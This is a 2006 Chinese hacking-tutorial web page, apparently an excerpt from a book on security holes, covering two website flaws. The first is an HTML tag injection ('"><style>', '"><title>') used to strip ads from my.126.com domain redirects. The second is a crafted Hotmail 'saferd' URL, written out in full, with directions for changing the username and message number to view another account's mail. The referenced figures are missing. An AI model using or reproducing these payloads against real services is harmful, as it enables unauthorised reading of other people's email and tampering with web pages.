学院首页>安全防御>黑客技法>黑客攻防技术内幕-安全漏洞与修补(6)

黑客攻防技术内幕-安全漏洞与修补(6)

作者: 来源: 添加时间:2006-5-25 23:56:03
4.4 网站存在的安全漏洞

 

4.4  网站存在的安全漏洞

4.4.1  去除my.126.com免费域名网易广告

"><style>

图4-21  申请域名转向

http://youurl"><title>

   http://youurl"><title>

图4-22  修改域名

图4-23  申请域名转向成功

4.4.2  Hotmail的漏洞

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%
3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%
26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%
3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%
26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

内容解释

MSG943322803%2e16:消息的编号。

Username:要查看的Hotmail账号的用户名,如果想查看emailbox view中的E-mail,就要去掉%26raw%3d0;如果不要Hotmail的顶端的风格,就去掉&hm___fl=attrd&domain= hotmail.com。


上一篇:黑客攻防技术内幕-安全漏洞与修补(3)
下一篇:黑客入侵方式全解密(1)
站内搜索